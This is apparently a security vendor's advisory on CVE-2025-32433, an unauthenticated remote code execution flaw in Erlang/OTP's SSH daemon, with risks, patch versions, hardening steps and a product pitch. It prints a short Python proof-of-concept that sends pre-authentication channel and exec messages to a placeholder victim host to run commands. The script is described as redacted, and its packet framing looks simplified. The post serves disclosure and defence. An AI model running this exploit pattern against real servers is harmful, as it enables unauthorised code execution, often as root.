Exploited! Erlang/OTP SSH Unauthenticated Remote Code Execution Vulnerability (CVE-2025-32433)
Erlang/OTP ships with an SSH daemon that many telecom, IoT, Elixir/Phoenix, RabbitMQ and CouchDB deployments leave running for convenience.
A flaw in how that daemon parses pre-authentication SSH protocol messages enables an attacker to break out of the key-exchange state machine and open an arbitrary channel before credentials are verified. On all versions prior to OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20, this short-circuits every subsequent security control and lets a remote adversary execute commands with the daemon’s privileges—often root—over nothing more than TCP/22.
GitHub assigned the flaw a CVSS 3.1 score of 10.0 (CRITICAL) and MITRE classifies it under CWE-306: Missing Authentication for Critical Function.
The bug was responsibly disclosed by researchers at Ruhr-University Bochum and patched within 48 hours, but proof-of-concept (PoC) exploits followed immediately.
In this article
Exploiting the Vulnerability
Below is a heavily redacted PoC that weaponises the logic error. It builds a raw SSH packet sequence that opens a session channel and drops a file on the target—all without authenticating:
#!/usr/bin/env python3
# PoC for CVE-2025-32433 — educational use only
import socket, struct
HOST = "victim.example.com"
PORT = 22
def msg(kind, payload=b""):
return struct.pack(">IB", len(payload)+1, kind) + payload
with socket.create_connection((HOST, PORT)) as s:
s.sendall(b"SSH-2.0-Exploit\r\n") # bogus banner
s.recv(256) # banner back
s.sendall(msg(20) + msg(90, b"session")) # KEXINIT + CHANNEL_OPEN
s.sendall(msg(98, b"exec\x00\x00\x00\x04id -a")) # CHANNEL_REQUEST
print(s.recv(4096).decode())Because the daemon never reaches userauth state, it accepts the CHANNEL_OPEN and immediately processes exec, running id -a (or any payload supplied). Horizon3 and several independent researchers have confirmed exploitation is “surprisingly easy” and public PoCs are now on GitHub.
Potential Risks
- Full System Compromise – When ssh:daemon/4 runs as root (the default in many embedded builds), adversaries gain shell-level control, enabling lateral movement, ransomware deployment or data exfiltration.
- Widespread Exposure – Erlang/OTP underpins routers, 5G core components, message brokers and IoT gateways. Many of these are internet-facing with weak network segmentation.
- High Automation Potential – The exploit requires no credentials, no user interaction and negligible bandwidth, making it ideal for botnet operators and worm-like propagation.
- Business Disruption – Telecom outages, VoIP downtime and loss of critical messaging back-planes translate directly into SLA penalties and revenue loss.
Given the breadth of Erlang-based software, defenders should assume exploit attempts will surface in automated scanners and commodity attack kits soon.
Mitigation Steps
- Patch Immediately
Upgrade the Erlang or distribution-supplied packages to the fixed versions:
| Erlang Line | Patched Release |
| 27.x | 27.3.3 |
| 26.x | 26.2.5.11 |
| 25.x | 25.3.2.20 |
Ubuntu / Debian quick-fix:
sudo apt update && sudo apt install --only-upgrade erlang-base erlang-ssh
erl -eval 'erlang:display(erlang:system_info(otp_release)), halt().'- Disable the SSH Application if Unused
In your sys.config (or rebar.config), add:
{ssh, [{enabled, false}]}.Then rebuild or hot-load the config:
bin/myapp remote_console
application:stop(ssh), init:restart().- Restrict Network Access (interim control)
# allow only the bastion host to reach Erlang SSH
sudo iptables -I INPUT -p tcp --dport 22 ! -s <bastion-IP> -j DROP- Runtime Hardening
- Run the daemon under a non-privileged user ({user_dir, “/nonroot”} in the release).
- Enable SELinux/AppArmor confinement.
- Monitor with IONIX Exposure Validator to continually validate mitigations across your externally implemented CTEM program.
These steps mirror the official advisory guidance and align with continuous threat exposure management (CTEM) best practices implemented by IONIX.
Am I Impacted by CVE-2025-32433?
IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the threat center of the IONIX portal.
IONIX customers will see updated information on their specific assets in the threat center of the IONIX portal.
References
- National Vulnerability Database entry for CVE-2025-32433
- GitHub Security Advisory GHSA-37cp-fgq5-7wc2
- BleepingComputer coverage on public PoCs
- CSO Online analysis of IoT/telecom exposure
Openwall oss-security disclosure thread
